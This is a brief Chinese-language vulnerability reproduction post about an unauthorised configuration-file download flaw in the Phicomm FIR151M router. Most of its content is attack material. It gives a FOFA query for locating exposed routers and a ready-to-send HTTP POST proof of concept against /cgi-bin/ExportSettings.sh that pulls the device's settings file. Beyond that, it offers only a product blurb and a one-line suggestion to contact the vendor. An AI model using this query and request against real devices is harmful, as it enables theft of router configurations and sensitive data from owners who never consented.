【漏洞复现】斐讯FIR151M路由器未授权下载漏洞

Nx01 产品简介

        斐讯数据通信技术有限公司成立于2009年，是为用户提供智慧家庭领域智能产品和云服务的科技创新性企业。

Nx02 漏洞描述

        斐讯 FIR151M路由器配置文件未授权下载漏洞,攻击者可利用该漏洞获取敏感信息。

Nx03 产品主页

fofa-query: app="PHICOMM-FIR151M"

Nx04 漏洞复现

POC：

POST /cgi-bin/ExportSettings.sh HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 25
Host: {{Hostname}}
Pragma: no-cache
Connection: close

Export=%E5%A4%87%E4%BB%BD

Nx05 修复建议

建议联系软件厂商进行处理。